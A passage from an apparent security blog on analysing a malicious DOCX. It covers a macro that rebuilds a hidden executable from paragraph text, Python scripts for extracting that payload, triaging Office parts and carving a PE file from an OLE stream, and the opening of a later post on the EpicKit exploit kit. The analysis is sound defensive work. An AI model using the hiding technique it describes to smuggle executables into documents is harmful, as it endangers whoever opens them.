<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErSRbjiAahs3HTugv_vsZxVGXP6TTYjPYjkSbgEjNjRIFLbkmOOY-wC5TKWPHgCnO_LbyhDSj3EDMCriF7MwXlQBhLNdXiXNnmo7GCCO47_qF5GNUX-fLfJ23JorogFx-jXLeVsWBP26B/s1600/OfficeMalScanner_docx.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErSRbjiAahs3HTugv_vsZxVGXP6TTYjPYjkSbgEjNjRIFLbkmOOY-wC5TKWPHgCnO_LbyhDSj3EDMCriF7MwXlQBhLNdXiXNnmo7GCCO47_qF5GNUX-fLfJ23JorogFx-jXLeVsWBP26B/s1600/OfficeMalScanner_docx.PNG" height="163" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">inflate</span>' option output</i></span></div>
<u><br /></u>
<u>NOTE:</u> Simply changing an Office Open XML file extension to '<span style="color: #3d85c6;">zip</span>' and opening the file with an archiving tool of your choice will allow you to extract its file structure as well.<br />
<br />
The decompressed files are stored in the '<span style="color: #3d85c6;">DecompressedMsOfficeDocument</span>' folder under the user's '<span style="color: #3d85c6;">%TEMP%</span>' location. In this particular example, the tool flagged one file, '<span style="color: #3d85c6;">word/vbaProject.bin</span>', as suspicious and suggested running the tool against it with the '<span style="color: #3d85c6;">scan</span>' or '<span style="color: #3d85c6;">info</span>' options.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HHrnioNs1PglNkaW7HFpxrIGuD4I28IV-gVmczqOCP3BWDy8ryoiBJn6lyRgej7AzKBwHHTvuxcpGVWjWt1WIPWLi3MtxmxPcxbG0yx0uIb7g0U-IrthQ-qtKrABs4Elj_3SHPDXFn2W/s1600/OfficeMalScanner_vb_embedded.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HHrnioNs1PglNkaW7HFpxrIGuD4I28IV-gVmczqOCP3BWDy8ryoiBJn6lyRgej7AzKBwHHTvuxcpGVWjWt1WIPWLi3MtxmxPcxbG0yx0uIb7g0U-IrthQ-qtKrABs4Elj_3SHPDXFn2W/s1600/OfficeMalScanner_vb_embedded.PNG" height="113" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">info</span>' option output for the VB script embedded in the DOCX file</i></span></div>
<br />
The tool has found and extracted an embedded VB script. Unlike the one in the previous example, this script does not reach out to any external source. Instead, it extracts the '<span style="color: #3d85c6;">text</span>' (&lt;w:t&gt;) from each '<span style="color: #3d85c6;">paragraph</span>' (&lt;w:p&gt;) in the document, saves the extracted data to a file and executes it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSNnGHgDBS3dIWDZVf9RmxPRw5MGCghzFvMBJTyTdXTPqHkEFx26J13Fd6pDbnlnAEOJFQDRTfxZWJrz-tGG57QYASpb-uVUduQtUL2cb38uh05JIodxTDuxlgyqx8r_Zbl8YYI90FYBib/s1600/docx_vbscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSNnGHgDBS3dIWDZVf9RmxPRw5MGCghzFvMBJTyTdXTPqHkEFx26J13Fd6pDbnlnAEOJFQDRTfxZWJrz-tGG57QYASpb-uVUduQtUL2cb38uh05JIodxTDuxlgyqx8r_Zbl8YYI90FYBib/s1600/docx_vbscript.PNG" height="207" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Extract from malicious VB script (no execution part included)</i></span></div>
<br />
At this point we know there is an executable file hidden in this document, but since it is represented as text, the '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool will not detect it. The screenshot below shows some of the paragraphs and the text stored in them that together make up the executable file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4HImx16iozzeP1wmUq1IsyxeLuR-hUXVkNMungjKFxRVtsi0krPMr1NW2mymjykSIeQMe8_AsGx5sz6zQN_uodWDTzmzQlqvlDcDOnBrOT1D9wwLGWLUadJWjOPk6InxO6fBIH7d3LB_/s1600/docx_view_in_XML_explorer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4HImx16iozzeP1wmUq1IsyxeLuR-hUXVkNMungjKFxRVtsi0krPMr1NW2mymjykSIeQMe8_AsGx5sz6zQN_uodWDTzmzQlqvlDcDOnBrOT1D9wwLGWLUadJWjOPk6InxO6fBIH7d3LB_/s1600/docx_view_in_XML_explorer.PNG" height="136" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">word/document.xml</span>' file view in '<span style="color: #3d85c6;">XML Explorer</span>' tool</i></span></div>
<br />
The following simple Python 3 script can help to reconstruct the file from the text strings. It reads '<span style="color: #3d85c6;">word/document.xml</span>' straight out of the DOCX (ZIP) container, joins the text of every &lt;w:t&gt; element in document order (the same thing the macro does; the XML parser also turns the '<span style="color: #3d85c6;">&amp;amp;</span>' entities in the raw XML back into '<span style="color: #3d85c6;">&amp;</span>'), and then hex-decodes the run of VBA-style '<span style="color: #3d85c6;">&amp;H</span>' byte literals.<br />
<br />
<pre>import re
import zipfile
import xml.etree.ElementTree as ET

# WordprocessingML namespace used by word/document.xml
W_NS = '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}'


def saveFile(filename, content):
    with open(filename, "wb") as fo:
        fo.write(content)


def main(inputFile, outputFile):
    # a DOCX is a ZIP container; the visible text lives in word/document.xml
    docxFile = zipfile.ZipFile(inputFile)
    root = ET.fromstring(docxFile.read('word/document.xml'))
    # join the text of every &lt;w:t&gt; run with no separators, as the macro does;
    # the parser decodes &amp;amp;H back to &amp;H, so the regex below sees the raw literals
    textContentInOneString = ''.join(t.text or '' for t in root.iter(W_NS + 't'))
    # the payload is stored as one run of VBA hex literals: &amp;H4D&amp;H5A&amp;H90...
    bytesOnlyRegexGroup = re.search(r'(?:&amp;H[0-9A-Fa-f]{2})+', textContentInOneString)
    if bytesOnlyRegexGroup is None:
        raise ValueError('no &amp;H byte literals found in word/document.xml')
    bytesOnly = bytes.fromhex(bytesOnlyRegexGroup.group(0).replace("&amp;H", ""))
    saveFile(outputFile, bytesOnly)


readFrom = "C:\\infected\\27.05.2014\\Law Society message.docx"
saveTo = "C:\\infected\\27.05.2014\\extracted.bin"

main(readFrom, saveTo)</pre>
<br />
Checking the extracted file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMjySKx9XbWdoAEOyL6W9c_q2-t1JIVhGYSldvsNrE0bhnJKHGsHKtHnmrK5-X-LbSxo1jJqa2oF0mwLH3UJhRcl7-Te0EA7mku9QgkilQRlCohAk1QXrziew-wMkm8clZqoyJULlPjxs/s1600/extracted_bin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMjySKx9XbWdoAEOyL6W9c_q2-t1JIVhGYSldvsNrE0bhnJKHGsHKtHnmrK5-X-LbSxo1jJqa2oF0mwLH3UJhRcl7-Te0EA7mku9QgkilQRlCohAk1QXrziew-wMkm8clZqoyJULlPjxs/s1600/extracted_bin.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracted file header</i></span></div>
<br />
Target confirmed. Further info on the file is available on <a href="https://www.virustotal.com/en/file/706f0063050073ed5f0e004d6f44523b79419f7db3be18feffc73386e030f54c/analysis/" rel="nofollow" target="_blank">VT</a>.<br />
<br />
Other files in the Office Open XML structure that can be useful during analysis:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU3Wj3ECeu7vVkCeG-Zs83NFBXk2wbOaT-cggpxh9-zoZ3zjhX7NFeMZfNdGW83l3zs8HErHSIcxDnYv-uTPcmWE-9TZGYXOZGMQu0xp2obGCdJPrTn97qckMuuuAyypIV6mdi5xfKRZKH/s1600/other_files1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU3Wj3ECeu7vVkCeG-Zs83NFBXk2wbOaT-cggpxh9-zoZ3zjhX7NFeMZfNdGW83l3zs8HErHSIcxDnYv-uTPcmWE-9TZGYXOZGMQu0xp2obGCdJPrTn97qckMuuuAyypIV6mdi5xfKRZKH/s1600/other_files1.PNG" height="75" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">\[Content_Types].xml</span>' file view in XML Explorer tool</i></span></div>
<br />
The '<span style="color: #3d85c6;">[Content_Types].xml</span>' file holds the list of all the content types used in the document. It is a quick place to spot parts that an ordinary document should not have, such as a '<span style="color: #3d85c6;">vbaProject.bin</span>' override with the '<span style="color: #3d85c6;">application/vnd.ms-office.vbaProject</span>' content type, or a default mapping of the '<span style="color: #3d85c6;">bin</span>' extension to '<span style="color: #3d85c6;">application/vnd.openxmlformats-officedocument.oleObject</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnt3LF37zRwLV1yzBOCrKzNE9VJ18duvjkx4JJ0f0HAIhOqXSrXNBEgAuEoKZSNJsrn0v8NxJdTXdtegiygMpQWr7cQ9-Wcr2UYsauTt_zhVpw_FHzDLE2OqJ6HyRu0ivXDT18P4Cm2GvN/s1600/other_files2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnt3LF37zRwLV1yzBOCrKzNE9VJ18duvjkx4JJ0f0HAIhOqXSrXNBEgAuEoKZSNJsrn0v8NxJdTXdtegiygMpQWr7cQ9-Wcr2UYsauTt_zhVpw_FHzDLE2OqJ6HyRu0ivXDT18P4Cm2GvN/s1600/other_files2.PNG" height="59" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">\word\_rels\document.xml.rels</span>' file view in XML Explorer tool</i></span></div>
<br />
The '<span style="color: #3d85c6;">\word\_rels\document.xml.rels</span>' file contains details about any embedded elements. In the example above it shows 4 embedded OLE objects. These are not necessarily malicious. Objects embedded into a DOCX file are stored as OLE compound files in the '<span style="color: #3d85c6;">\word\embeddings</span>' folder and can be analysed with the '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool. If the tool finds nothing suspicious, the '<span style="color: #3d85c6;">SSViewer (Structured Storage Viewer)</span>' utility can be used to extract the content of an OLE object for further analysis. The screenshot below shows an OLE file opened in SSViewer. Individual OLE streams can be extracted and saved to a data stream file.<br />
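<br />
As an added example (not code from the original post, and not part of OfficeMalScanner or SSViewer), the following Python 3 script does the same walk programmatically: it reads '[Content_Types].xml' to find parts whose content type marks them as a VBA project, and follows the relationships in 'word/_rels/document.xml.rels' to list the embedded OLE objects and packages under 'word/embeddings'. It builds a small DOCX in memory so that it runs offline; that container, its part names and its relationship IDs are constructed for the example, not taken from the sample in the post.<br />

```python
"""Triage the parts of an Office Open XML (DOCX) container without opening it in Word."""
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

CT_NS = '{http://schemas.openxmlformats.org/package/2006/content-types}'
REL_NS = '{http://schemas.openxmlformats.org/package/2006/relationships}'
# content type Word assigns to the VBA project part of a macro-enabled document
VBA_CONTENT_TYPE = 'application/vnd.ms-office.vbaProject'
# relationship types whose targets are stored under word/embeddings
EMBED_REL_SUFFIXES = ('/oleObject', '/package')


def build_sample_docx():
    """Constructed sample: a DOCX skeleton with a VBA project and two embedded objects."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
        '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        '</Types>'
    )
    doc_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>'
        '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="embeddings/Microsoft_Word_Document1.docx"/>'
        '<Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('[Content_Types].xml', content_types)
        zf.writestr('word/_rels/document.xml.rels', doc_rels)
        zf.writestr('word/document.xml', '<document/>')
        # only the OLE compound file magic, enough for the listing (constructed, not real objects)
        zf.writestr('word/vbaProject.bin', b'\xd0\xcf\x11\xe0' + b'\x00' * 28)
        zf.writestr('word/embeddings/oleObject1.bin', b'\xd0\xcf\x11\xe0' + b'\x00' * 28)
        zf.writestr('word/embeddings/Microsoft_Word_Document1.docx', b'PK\x05\x06' + b'\x00' * 18)
    return buf.getvalue()


def content_type_overrides(zf):
    """Map of part name -> content type from the Override entries in [Content_Types].xml."""
    root = ET.fromstring(zf.read('[Content_Types].xml'))
    return {o.get('PartName'): o.get('ContentType') for o in root.iter(CT_NS + 'Override')}


def relationships(zf, rels_part='word/_rels/document.xml.rels'):
    """List of (Id, Type, Target) from a .rels part; Target is relative to the source part's folder."""
    root = ET.fromstring(zf.read(rels_part))
    return [(r.get('Id'), r.get('Type'), r.get('Target')) for r in root.iter(REL_NS + 'Relationship')]


def triage_docx(data):
    """Return the parts worth extracting for OfficeMalScanner / SSViewer follow-up."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = set(zf.namelist())
    overrides = content_type_overrides(zf)
    vba_parts = [p.lstrip('/') for p, ct in overrides.items() if ct == VBA_CONTENT_TYPE]
    embedded = []
    for rid, rtype, target in relationships(zf):
        if rtype and rtype.endswith(EMBED_REL_SUFFIXES):
            # resolve the relative Target against the word/ folder that owns document.xml
            part = posixpath.normpath(posixpath.join('word', target)).lstrip('/')
            embedded.append((rid, part, part in names))
    return {'vba_parts': vba_parts, 'embedded_objects': embedded}


if __name__ == '__main__':
    print(triage_docx(build_sample_docx()))
```

Each tuple in 'embedded_objects' carries the relationship ID, the resolved part name and whether that part actually exists in the archive; a relationship pointing at a missing part, or a part under 'word/embeddings' that no relationship references, is worth a closer look.<br />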
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFwCM6c7hM4Xr09W10dLK3Pp_GNDvPCy09qTZMRma0t0WBzepnu7rweiEe42rmYaQc8St8H1El_AqX8uR6_PvgCCZJWeQurkvvZkG0iG5_r1TgKVmc5DoDk5JCjRjye97OhQUxwFx_sZtv/s1600/ssviewer_save_stream.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFwCM6c7hM4Xr09W10dLK3Pp_GNDvPCy09qTZMRma0t0WBzepnu7rweiEe42rmYaQc8St8H1El_AqX8uR6_PvgCCZJWeQurkvvZkG0iG5_r1TgKVmc5DoDk5JCjRjye97OhQUxwFx_sZtv/s1600/ssviewer_save_stream.png" height="127" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracting content of an OLE file using SSViewer tool</i></span></div>
<br />
The content is saved to a file with a '<span style="color: #3d85c6;">.stream</span>' extension. Further file <a href="http://www.garykessler.net/library/file_sigs.html" rel="nofollow" target="_blank">header</a> analysis is required to determine the file type. In this particular example, the extracted content turned out to be a <a href="http://en.wikipedia.org/wiki/Windows_Metafile" rel="nofollow" target="_blank">WMF</a> (Windows Metafile) file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyj12Fb51MinqUVQlcHHAijRjYv7Q21c02ZEYmtbSnTSLvHvT7abuNxmdB3Z_HPMND92AJe8fPMjz0bPeSopVGCORqU7yOGnmmgIkGeGX7fQaV0LqcvVrcFsTTK519NeZhQsns-_XKCoQs/s1600/embedded_wmf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyj12Fb51MinqUVQlcHHAijRjYv7Q21c02ZEYmtbSnTSLvHvT7abuNxmdB3Z_HPMND92AJe8fPMjz0bPeSopVGCORqU7yOGnmmgIkGeGX7fQaV0LqcvVrcFsTTK519NeZhQsns-_XKCoQs/s1600/embedded_wmf.PNG" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>example of a file extracted from an OLE object</i></span></div>
<br />
Saving a stream to a file will not always reconstruct the original file. The snapshot below shows a stream extracted from an OLE object that was embedded in a DOCX file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl_GQuaVWHu8IuwDat1t9aKpd_ERrN8045OA4D0o_v3Kzt71hfGbuj4_fR-V-Q56wCchb9cmyn9ZPbZPQDGrRd-js3ba0TJUW6dHi-DUxRN35k9AAMT_75dTciD8rZA5nWCCUDezc-PAAu/s1600/embedded_exe1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl_GQuaVWHu8IuwDat1t9aKpd_ERrN8045OA4D0o_v3Kzt71hfGbuj4_fR-V-Q56wCchb9cmyn9ZPbZPQDGrRd-js3ba0TJUW6dHi-DUxRN35k9AAMT_75dTciD8rZA5nWCCUDezc-PAAu/s1600/embedded_exe1.PNG" height="16" width="320" /></a></div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-size: x-small;"><i>example of a stream file extracted from an OLE object</i></span></div>
<br /></div>
Apart from revealing where the embedded file was stored on the originating machine, note the '<span style="color: #3d85c6;">MZ</span>' and '<span style="color: #3d85c6;">This program must</span>' strings. It is safe to assume that the embedded file is an EXE, but in its current form it carries some extra bytes. To restore the original file from the saved stream, we need to remove the data preceding the EXE header and the extra data at the end. The preceding data is not a problem: simply removing everything up to '<span style="color: #3d85c6;">MZ</span>' gives us the beginning of the original file. The extra data at the end can be trickier, because a PE file does not record its own length; the image ends where the last section's raw data ends (the highest '<span style="color: #3d85c6;">PointerToRawData</span>' + '<span style="color: #3d85c6;">SizeOfRawData</span>' in the section table), and anything after that offset is an overlay. One way to find that boundary is to use the '<span style="color: #3d85c6;">PEStudio</span>' tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiK3yG33uoRsYA9WoY2NRAmzMHiZV6I47Rax9w-wcPI2h968UTpNiEnkr2Eht6NJ1OrACT7WGAI4LHwtfi2iZvDoyaEPt4KOIakfGNpoHvMdxl7rsl15QZVesnSPLu092P-s72SyQiAOc/s1600/pestudio_overlay_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiK3yG33uoRsYA9WoY2NRAmzMHiZV6I47Rax9w-wcPI2h968UTpNiEnkr2Eht6NJ1OrACT7WGAI4LHwtfi2iZvDoyaEPt4KOIakfGNpoHvMdxl7rsl15QZVesnSPLu092P-s72SyQiAOc/s1600/pestudio_overlay_example.PNG" height="169" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">overlay</span>' detected in PEStudio</i></span></div>
<br />
PEStudio has detected extra bytes (an overlay) starting at offset 0x00322E00. Now we need to locate that offset towards the end of the stream file and remove everything from it onwards.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1XIJzwOQoVRHpIZf-RJnVPjosY9cTLdSFbhAOLM6WR3kRCmcXE4h05BzFQ75YA_ctJOtnoLnCp5xhyTWVs24WEr8bXD-Brqmf50s2J0ZfWYX1ImpaOtE2PLqg1WHEjsaVpWCzedpH7NDI/s1600/extra_data_at_the_end.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1XIJzwOQoVRHpIZf-RJnVPjosY9cTLdSFbhAOLM6WR3kRCmcXE4h05BzFQ75YA_ctJOtnoLnCp5xhyTWVs24WEr8bXD-Brqmf50s2J0ZfWYX1ImpaOtE2PLqg1WHEjsaVpWCzedpH7NDI/s1600/extra_data_at_the_end.PNG" height="252" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>the end of the extracted stream containing the overlay</i></span></div>
<br />
Once the extra data is removed, the original EXE file is fully restored and can be analysed further. If for whatever reason we want a copy of the overlay data, PEStudio can be used to save it to a file. It is worth keeping that copy: an overlay is not necessarily junk, as some executables (self-extracting archives and installers, for instance) read their own payload from it.<br />
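<br />
As an added example (not the post's own method and not a PEStudio feature), the following Python 3 script automates the two cuts described above: it locates the first '<span style="color: #3d85c6;">MZ</span>' that leads to a valid '<span style="color: #3d85c6;">PE\0\0</span>' signature, skipping a decoy 'MZ' that happens to appear in the originating path, and computes where the image ends from the section table, which is the same value PEStudio reports as the overlay start. The stream it operates on is constructed inside the script (a minimal two-section PE32 image wrapped in a fake path and a fake overlay), so it is not the sample from the post.<br />

```python
"""Carve a PE image out of a saved OLE stream and split off the overlay."""
import struct

SECTION_HEADER_SIZE = 40  # sizeof(IMAGE_SECTION_HEADER)


def pe_size_on_disk(pe):
    """Return how many bytes the PE image occupies on disk, per its section table.

    Raises ValueError when the bytes at offset 0 do not lead to a valid PE header,
    so a decoy 'MZ' inside the prefix (e.g. in a file path) is rejected.
    """
    if pe[:2] != b'MZ' or len(pe) < 0x40:
        raise ValueError('not a DOS header')
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b'PE\x00\x00':
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    num_sections = struct.unpack_from('<H', pe, coff + 2)[0]
    size_of_optional = struct.unpack_from('<H', pe, coff + 16)[0]
    section_table = coff + 20 + size_of_optional
    # start from the end of the headers; each section may push the end further out
    end = section_table + num_sections * SECTION_HEADER_SIZE
    for i in range(num_sections):
        # SizeOfRawData is at +16 and PointerToRawData at +20 in IMAGE_SECTION_HEADER
        raw_size, raw_ptr = struct.unpack_from('<II', pe, section_table + i * SECTION_HEADER_SIZE + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def carve_pe(stream):
    """Split an OLE stream into (prefix, pe_image, overlay).

    Scans 'MZ' candidates in order and keeps the first one whose e_lfanew
    points at a real 'PE\\0\\0' signature; everything past the last section's
    raw data is returned as the overlay.
    """
    start = stream.find(b'MZ')
    while start != -1:
        try:
            size = pe_size_on_disk(stream[start:])
            return stream[:start], stream[start:start + size], stream[start + size:]
        except (ValueError, struct.error):
            start = stream.find(b'MZ', start + 1)
    raise ValueError('no PE image found in stream')


def build_sample_stream():
    """Constructed sample: a fake originating path (containing a decoy 'MZ'),
    a minimal two-section PE32 image and a trailing overlay."""
    e_lfanew, opt_size, num_sections = 0x80, 0xE0, 2
    pe = bytearray(0x600)
    pe[0:2] = b'MZ'
    stub = b'This program cannot be run in DOS mode.\r'
    pe[0x40:0x40 + len(stub)] = stub
    struct.pack_into('<I', pe, 0x3C, e_lfanew)
    pe[e_lfanew:e_lfanew + 4] = b'PE\x00\x00'
    struct.pack_into('<HH', pe, e_lfanew + 4, 0x14C, num_sections)  # Machine=i386, NumberOfSections
    struct.pack_into('<H', pe, e_lfanew + 4 + 16, opt_size)          # SizeOfOptionalHeader
    struct.pack_into('<H', pe, e_lfanew + 24, 0x10B)                 # PE32 magic
    section_table = e_lfanew + 24 + opt_size
    for i, (name, raw_size, raw_ptr) in enumerate([(b'.text', 0x200, 0x200), (b'.data', 0x200, 0x400)]):
        off = section_table + i * SECTION_HEADER_SIZE
        pe[off:off + len(name)] = name
        struct.pack_into('<II', pe, off + 16, raw_size, raw_ptr)
    pe[0x200:0x204] = b'\x31\xc0\xc3\xcc'  # a few bytes of fake .text
    # fake stream prefix: flags plus the path on the originating machine; 'MZimmer' is the decoy
    prefix = b'\x00\x02' + b'C:\\Users\\MZimmer\\Desktop\\invoice.exe\x00'
    overlay = b'OVERLAY-DATA-' * 4
    return prefix + bytes(pe) + overlay


if __name__ == '__main__':
    prefix, image, overlay = carve_pe(build_sample_stream())
    print(len(prefix), len(image), len(overlay))
```

On a real '.stream' file, read it in binary mode, pass the bytes to carve_pe and write the middle element to disk; the first element is the metadata the screenshot shows before 'MZ', and the third is exactly what PEStudio would dump as the overlay.<br />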
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHKcGoM5_he7Gd7uKo7Hjm379PoVCLJMYrLN2nwEbjJPZzfI-HhEvrtKvygVodR0Z3icX1s6Yca6XaJz8cpAsWoBfEZf7iHrWonAW6TrLh70_QHyndYmmvU_liqEk4OwIIpkXG5135Sy4/s1600/pestudio_overlay_dump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHKcGoM5_he7Gd7uKo7Hjm379PoVCLJMYrLN2nwEbjJPZzfI-HhEvrtKvygVodR0Z3icX1s6Yca6XaJz8cpAsWoBfEZf7iHrWonAW6TrLh70_QHyndYmmvU_liqEk4OwIIpkXG5135Sy4/s1600/pestudio_overlay_dump.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>saving '<span style="color: #3d85c6;">overlay</span>' to a file </i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6UbsL5wBCWFuZHRqTYgy1v_ANQrApOQ0Rbu62_pN_H6H9AoZUhiVUqxRGgWI2KBgqeGDG_sofU6Sf2yRTcmJaXDHY0EQMZM8k_9q799KC6WM2hCyPSufBU0SmnQGK9OTKRugk0dnywh3/s1600/extracted_overlay.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6UbsL5wBCWFuZHRqTYgy1v_ANQrApOQ0Rbu62_pN_H6H9AoZUhiVUqxRGgWI2KBgqeGDG_sofU6Sf2yRTcmJaXDHY0EQMZM8k_9q799KC6WM2hCyPSufBU0SmnQGK9OTKRugk0dnywh3/s1600/extracted_overlay.PNG" height="147" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracted '<span style="color: #3d85c6;">overlay</span>' file </i></span></div>
<br />
<br />Hope these tips are helpful.<br />
<br />
<br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-250109472373647719.post-82373930290562013742014-01-19T17:44:00.001+00:002014-01-20T12:30:47.312+00:00EpicKit aka Epic JDB: "Do you want fries with that?"NOTE: The information is based on a sample captured on 2014-01-14.<br />
<br />
Thanks to <a href="https://twitter.com/cryptoron" rel="nofollow" target="_blank">@cryptoron</a> for <a href="https://twitter.com/cryptoron/status/423081187649671168" rel="nofollow" target="_blank">raising</a> the awareness and <a href="https://twitter.com/MaartenVDantzig" rel="nofollow" target="_blank">@MaartenVDantzig</a> for sharing some intel.<br />
<br />
<b><span style="color: #3d85c6;">"You know, for kids!"</span></b><br />
<br />
Here's a quick description of this kit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWT-P9UH-1ymSeFKtTdjyIJZi-d4I8Bbxz34H4EVAC6z6pnVKDtRcxLOkP0zPNHEipk1jHOiZSqTltWVa2WRdrZQaO2uPygG_6O6QP6iuXqsBHI27H_yYYmSLn-MoNsmnkPoY7q1kfnn47/s1600/2014-01-14-EpicJDB-sales-thread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWT-P9UH-1ymSeFKtTdjyIJZi-d4I8Bbxz34H4EVAC6z6pnVKDtRcxLOkP0zPNHEipk1jHOiZSqTltWVa2WRdrZQaO2uPygG_6O6QP6iuXqsBHI27H_yYYmSLn-MoNsmnkPoY7q1kfnn47/s1600/2014-01-14-EpicJDB-sales-thread.png" height="320" width="301" /></a></div>
<div style="text-align: center;">
